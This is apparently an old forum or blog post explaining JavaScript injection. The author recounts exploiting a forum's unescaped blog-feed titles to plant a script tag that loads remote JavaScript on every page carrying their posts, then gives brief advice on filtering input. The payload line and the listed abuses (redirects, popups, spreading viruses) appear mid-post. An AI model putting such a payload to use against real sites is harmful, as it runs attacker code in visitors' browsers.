What is JavaScript Injection?

by kalai 2010-02-01 12:03:44

JavaScript injection is a site exploit that enables you to inject javascript snippets into the victim site’s web pages and perform common javascript tasks to whoever visit the page that’s been manipulated. Usually it’s not site wide but can trick the visitors and the servers in a few ways such as stealthily changing form submission variable values, restructuring page DOM, adding HTML elements and mess with the CSS styles.
The security bug that enables javascript injection

In forums with every post, they serve member blog feed via a tiny line under member name, displaying the title of the newest entry. With a bug of not converting essential HTML reserved literals such as < and > to HTML entities but leaving them as the real characters, I am able to inject HTML code into every page I have posts in.

This is going to be fun <script type="text/javascript" src="http://yourdomain.com/jsfun.js">

After entering the feed address of this blog, all forum pages with my posts start to picking up this feed and the newest entry title with an injection line in it. This simple line of HTML runs shawn.js located at http://7.charmhtml.com on the particular DP forum page. Each and every visitor coming to that page, will spot that funny little new Shawn logo I’ve replaced with the old DP forum one.
What more can I do with an injection

While you are able to do all these, you can redirect visitors to another site, put on your own banner ads, trigger a popup window and even spread viruses.
How to prevent it

The essential move you should take in securing your site against any JavaScript injections is to make sure you filter all illegal characters from user input, not only from explicitly typed and submitted data but also other channels of input from a user such as in this case, the user blog feed.

Tagged in:


You must LOGIN to add comments